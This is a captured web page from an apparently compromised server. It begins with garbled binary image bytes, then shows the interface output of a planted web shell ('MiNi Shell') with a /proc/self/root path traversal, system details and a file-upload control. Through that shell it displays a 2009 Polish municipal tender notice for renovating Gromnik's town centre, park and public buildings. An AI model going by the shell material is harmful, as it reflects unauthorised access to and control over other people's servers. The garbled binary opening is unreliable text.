JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090316/63666-N-2009.html

<p class="kh_header"><b>Gromnik: Kompleksowa odnowa centrum miejscowości Gromnik w gminie Gromnik realizowana w ramach Małopolskiego Regionalnego Programu Operacyjnego.</b><br>
<b>Numer ogłoszenia: 63666 - 2009; data zamieszczenia: 16.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul.  Witosa 2, 33-180 Gromnik, woj. małopolskie, tel. 014 6514202, 6514238, faks 014 6514095.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gromnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa odnowa centrum miejscowości Gromnik w gminie Gromnik realizowana w ramach Małopolskiego Regionalnego Programu Operacyjnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ODNOWA CENTRUM WSI ZAGOSPODAROWANIE ZABYTKOWEGO PARKU W GROMNIKU.
Lokalizacja na działkach nr 122/4, 124/1 i 124/2, 59, 127, 531, 230/1, 230/2 w Gromniku


1. POMOST NAD POTOKIEM POŹNIANKA DO 25M SŁUŻĄCY DO REKREACJI (O POWOWIERZCHNI 27,7 M2) -(konstrukcja stalowa wsparta na dwóch fundamentach, ciąg pieszy z desek, balustrada drewniana) - lokalizacja na działce nr 122/4 nad potokiem bez nazwy nr 59 w Gromniku.

2.1 PARKING Nr 1 i Nr2  DLA SAMOCHODÓW OSOBOWYCH DO 10 MIEJSC POSTOJOWYCH Z PRZEBUDOWĄ DROGI W CZĘŚCI ZACHODNIEJ ZABYTKOWEGO PARKU (K.KOŚCIOŁA) (O POWIERZCHNI 645,5M2) - Istniejące parkingi żwirowe i z płyt drogowych zostaną przebudowane na parkingi z kostki brukowej, istniejąca droga w jej granicach z płyt drogowych zostanie przebudowana na drogę z masy asfaltowej. Odprowadzenie wody z parkingu na teren własnej działki - lokalizacja na działce nr 124/1, 124/2 w Gromniku.

2.2 PLACYK REKREACYJNY ( O POWIERZCHNI 111 M2) - Istniejący plac z płyt drogowych zostanie przebudowany na plac rekreacyjny z kostki brukowej. Odprowadzenie wody z parkingu na teren własnej działki - lokalizacja na działce nr 124/1, 124/2 w Gromniku.

2.3 PRZEBUDOWA CHODNIKA PRZED BUDYNKIEM DWORKU (O POWIERZCHNI 268 M2) - Istniejący chodnik asfaltowo - żwirowy przed budynkiem dworku zostanie przebudowany na chodnik z kostki brukowej. Odprowadzenie wody z parkingu na teren własnej działki. - Lokalizacja ne działce nr 122/4 w Gromniku. 

2.4 PRZEBUDOWA DROGI REKREACYJNEJ W PARKU (O POWIERZCHNI 397 M2) - Istniejąca droga rekreacyjna, żwirowa zostanie przebudowana na chodnik z kostki brukowej połączony z pomostem rekreacyjnym nad potokiem - Lokalizacja na działce nr 122/4 w Gromniku.

3. PRZEBUDOWA ISTNIEJĄCEGO PARKINGU (KOŁO RONDA) ZE ZMIANĄ NAWIERZCHNI Z ASFALTOWEJ NA KOSTKĘ BRUKOWĄ
(O POWIERZCHNI 650 M2) - Istniejący parking asfaltowy zostanie przebudowany na parking z kostki brukowej w tych samych granicach działki. Odprowadzenie wody z parkingu na teren własnej działki - Lokalizacja na działce nr 127 w Gromniku.

4. PRZEBUDOWA ISTNIEJĄCEGO CHODNIKA DO URZĘDU I SZKOŁY WRAZ ZE SCHODAMI TERENOWYMI (O POWIERZCHNI 543m2) Istniejący chodnik z płytek chodnikowych w tych samych granicach zostanie przebudowany chodnik z kostki brukowej. Odprowadzenie wody z chodnika na teren własnej działki. - Lokalizacja na działce nr 122/4 w Gromniku.

5. RAMPA DLA NIEPEŁNOSPRAWNYCH (O POWIERZCHNI 32,40 M2) Istniejące schody z płytek chodnikowych w swoich granicach zostaną przebudowane na chodnik z kostki brukowej z podjazdami dla osób niepełnosprawnych. Lokalizacja na działce nr 122/4 w Gromniku.

6. PRZEBUDOWA PLACU W CZĘŚCI PÓŁNOCNEJ PARKU (KOŁO SZKOŁY) (O POWIERZCHNI 1360 M2) Istniejący plac przyszkolny z płytek chodnikowych w swoich granicach zostanie przebudowany na plac z kostki brukowej. Odprowadzenie wody z parkingu na teren własnej działki. Lokalizacja na działce nr 122/4 w Gromniku.

7. OŚWIETLENIE PARKOWE I INSTALACJA MONITORINGU BEZPRZEWODOWEGO ( 17 LAMP, 10 KAMER BEZPRZEWODOWYCH) - Istniejące, zniszczone lampy parkowe zostaną zdemontowane a w ich miejsce zamontowane zostaną stylowe lampy parkowe z wykorzystaniem istniejącego zasilania kablem ziemnym. Kamery bezprzewodowe zostaną zamontowane na budynku dworku i zamontowanych nowych lampach oświetleniowych. Lokalizacja na działce nr 122/4 w Gromniku.

8. ELEMENTY MAŁEJ ARCHITEKTURY Zainstalowanie typowych ławek parkowych, stolików, koszy na śmieci. Lokalizacja na działce nr 122/4 w Gromniku.

9. SZKOŁA PODSTAWOWA W GROMNIKU - WYKONANIE ELEWACJI, PLACÓW I CHODNIKÓW: 
Wysokość budynku 11,5 m. Lokalizacja na działce nr 122/4 w Gromniku.
9.1 ZASADNICZE PRACE TERMOMODERNIZACYJNE WRAZ Z WYMIANĄ STOLARKI ( POWIERZCHNIA DOCIEPLEŃ 2023,46M2 ) - ocieplenie elewacji styropianem gr. 10cm z wyprawą z masy akrylowej. Wymiana stalowych okien na okna z PCV w istniejących otworach okiennych.
9.2 OPASKA, PLACE, CHODNIKI ( ŁĄCZNA POWIERZCHNIA 983,63 M2) - wymiana opaski z płytek chodnikowych na kostkę, plac asfaltowy w części północno - wschodniej zostanie przebudowany na kostkę brukową, istniejący chodnik z płytek w części wschodniej zostanie przebudowany na kostkę brukową. Odprowadzenie wody z placów i chodników na teren własnej działki.

10 BUDYNEK GMINNEGO OŚRODKA KULTURY: - WYKONANIE ELEWACJI, PLACU I OPASKI. 
Wysokość budynku 11,0 m. - lokalizacja na działce nr 531 w Gromniku.
10.1 ZASADNICZE PRACE TERMOMODERNIZACYJNE WRAZ Z WYMIANĄ POKRYCIA DACHOWEGO (POWIERZCHNIA DOCIEPLEŃ 736,75M2) Prace będą polegać na ociepleniu elewacji styropianem gr. 10cm z wyprawą z masy akrylowej. Wymianie pokrycia dachowego z blachy ocynkowanej, falowanej, która uległa skorodowaniu na blachę dachówkową, wymianie orynnowania budynku.
10.2 WYMIANA STOLARKI - Nie dotyczy,
10.3 PRZEBUDOWA OPASKI, PLACU, (O POWIERZCHNI 144 M2) Istniejąca opaska z zniszczonej kostki brukowej w swoich granicach zostanie przebudowana na kostkę brukową. Istniejący, żwirowy plac przed budynkiem od strony północnej budynku w swoich granicach zostanie przebudowany na plac z kostki brukowej. Odprowadzenie wody z placu na teren własnej działki. 

11 BUDYNEK GŁÓWNY WIELOFUNKCYJNY: 
Wysokość budynku 7,0 m - lokalizacja na działkach nr 230/1 i 230/2 w Gromniku.
11.1 ZASADNICZE PRACE TERMOMODERNIZACYJNE WRAZ Z WYMIANĄ STOLARKI ( POWIERZCHNIA DOCIEPLEŃ 454,29 M2). Prace będą polegać na ociepleniu elewacji styropianem gr. 10cm z wyprawą z masy akrylowej. Wymianie pokrycia dachowego z blachy ocynkowanej, falowanej, która uległa skorodowaniu na blachę dachówkową, wymianie orynnowania budynku.
11.2 WYMIANA STOLARKI. Istniejące okna  i drzwi drewniane zostaną wymienione na okna z PCV w istniejących otworach okiennych.
11.3 PRZEBUDOWA PLACU PRZED BUDYNKIEM WIELOFUNKCYJNYM (O POWIERZCHNI 192 M2). Istniejący plac z płytek chodnikowych od strony zachodniej budynku zostanie przebudowany na plac z kostki brukowej. Odprowadzenie wody z plac na teren własnej działki.

12 ZAPLECZE BUDYNKU WIELOFUNKCYJNEGO WRAZ Z PRZYLEGAJĄCYM PLACEM:  
Wysokość budynku 3,0 m - lokalizacja na działkach nr 230/1  w Gromniku.
12.1 BUDYNEK ZAPLECZA (POWIERZCHNIA DOCIEPLEŃ 161,72 M2) Prace będą polegać na ociepleniu elewacji styropianem gr. 5cm z wyprawą z masy akrylowej. Wymianie pokrycia stropodachu z papy na papę termozgrzewalną, wymianie orynnowania budynku.
12.2 UTWARDZENIE PLACU POMIĘDZY BUDYNKIEM WIELOFUNKCYJNYM A BUDYNKIEM ZAPLECZA (O POWIERZCHNI 390 M2) Istniejący plac żwirowy między budynkami (wielofunkcyjnym i zaplecza) zostanie utwardzony tłuczniem. Odprowadzenie wody z placu na teren własnej działki..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium. w wysokości 20.000,00 zł, 
(słownie: dwadzieścia tysięcy zł).
1.Wadium musi być wniesione, być do dyspozycji Zamawiającego nie póxniej niż z terminem ostatecznego składania ofert.
2  Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z    dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.),

3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy w BSRz w Krakowie O/Gromnik Nr. 388558900060210000011820005.
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5. Zamawiający zwraca niezwłocznie wadium, jeżeli: 
1) upłynął termin związania ofertą; 
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy; 
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zosta-ły ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia. 
6. Z zastrzeżeniem art. 46, ust. 4a, ustawy PZP, zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy: 
1) który wycofał ofertę przed upływem terminu składania ofert; 
2) który został wykluczony z postępowania; 
3) którego oferta została odrzucona. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przy-czyn leżących po stronie wykonawcy.
9. Oryginał wniesienia wadium w formach, o których mowa w pkt. 11.3 ppkt. 2-5 należy złożyć w kasie Urzędu Gminy Gromnik. W przypadku złożenia oryginału dokumentu w kasie Urzędu Gminy, do oferty należy załączyć kopię dowodu wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 Ustawy Pzp:

1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia i w tym zakresie:

     a) Potencjał kadrowy (załącznik nr 3)
     	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. pracownikami posiadającymi odpowiednie kwalifikacje do wykonania robót wchodzących w zakres zamówienia zatrudnionymi u Wykonawcy na stanowiskach robotniczych (pracownicy budowlani, operatorzy sprzętu, kierowcy itd.) oraz że dysponuje kierownikiem budowy posiadającym uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej i legitymującym się aktualnym członkostwem właściwej miejscowo Izby Samorządu Zawodowego  Izby Inżynierów Budownictwa  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Kierownik budowy musi posiadać minimum 3 letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi oraz co najmniej 2-letnią praktykę zawodową przy zabytkach nieruchomych. 
     Przez minimalne kwalifikacje zawodowe dla stanowisk, dla których wymagane są uprawnienia budowlane rozumie się lata czynne zawodowo od daty uzyskania uprawnień budowlanych oraz lata przepracowane na odpowiednich stanowiskach kierowniczych. (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118)
     Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają  warunek określony w pkt. 1.2.a). 

b) Doświadczenie zawodowe (załącznik nr 7).

Wykonawca musi wykazać, że zrealizował w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zadania o zakresie i złożoności porównywalnej z przedmiotem niniejszego przetargu w zakresie budowy, przebudowy lub remontu obiektów budowlanych.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunek określony w pkt. 1.2.b)
c) Potencjał techniczny (załącznik nr 5)
Wykonawca musi wykazać, że dysponuje sprzętem niezbędnym do wykonania zamówienia. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają  warunek określony w pkt. 1.2.c)

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy Pzp.

4. Gwarancja jakości.

Wykonawca musi udzielić gwarancji jakości na wykonane roboty na okres  36 miesięcy, liczony od daty  odbioru końcowego robót. 

Ocena spełnienia  powyższych warunków dokonana będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń, o których mowa w rozdziale 7 niniejszej specyfikacji, według formuły    spełnia - nie spełnia. Z treści przedłożonych dokumentów musi wynikać jednoznacznie, iż  w/w warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1	Oświadczenie o spełnianiu warunków określonych w art.22 ust.1 ustawy - na załączniku nr 2 SIWZ;
2	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.	Wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć           w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności. Do wykazu kadry muszą być dołączone kopie uprawnień budowlanych i aktualny dokument stwierdzający przynależność do właściwej miejscowo Izby Samorządu Zawodowego (Izby Inżynierów Budownictwa) z określonym terminem ważności - na (załącznik 3).
Ponadto pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie o którym mowa powyżej Wykonawca wskazał osoby, którymi będzie dysponował.
5.	 Wykaz wykonanych w okresie ostatnich 5 lat robót budowlanych, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, pod uwagę będą brane te dokumenty, w których zostaną określone rodzaj, wartość robót, rok realizacji - na załączniku nr 6 SIWZ;
6. W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i  
     finansowej zapewniającej wykonanie zamówienia należy przedłożyć następujące dokumenty: 
1) sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres; 
2) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia; 
3) polisę, a w przypadku jej braku inny dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
7.	Kosztorys ofertowy - na załączniku nr 4 SIWZ
8.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej przedkłada dokumenty, o których mowa w § 2 Rozporządzenia Prezesa Rady Ministrów z dn. 19.05.2006r. (Dz.U. Nr 87 poz. 605 z dnia 24.05.2006r) ze zmianą z dnia 16.10.2008 r. (Dz.U. z 2008 r. Nr 188 poz.1155) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.
9.	Pełnomocnictwo dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie niniejszego postępowania. Do oferty należy załączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców  ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.
10.	 Formularz projektu umowy - załącznik nr 7.
11.	Dowód wniesienia wadium.

UWAGA
Dokumenty winny być złożone w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez Wykonawcę za wyjątkiem pełnomocnictwa, złożonego w formie oryginału bądź poświadczonej notarialnie kopii..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gromnik.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówieni można odebrać osobiście w Urzędzie Gminy w Gromniku, ul. Witosa 2, 33-180 Gromnik, pokój nr 10 , w cenie 10 zł, lub za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:00, miejsce: Oferty w zapieczętowanych kopertach należy złożyć na następujący adres: Urząd Gminy w      Gromniku, ul. Witosa 2, 33-180 Gromnik, pokój nr 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany będzie ze środków Unii Europejskiej  - działanie 6.2 schemat A

Creat By MiNi SheLL
Email: jattceo@gmail.com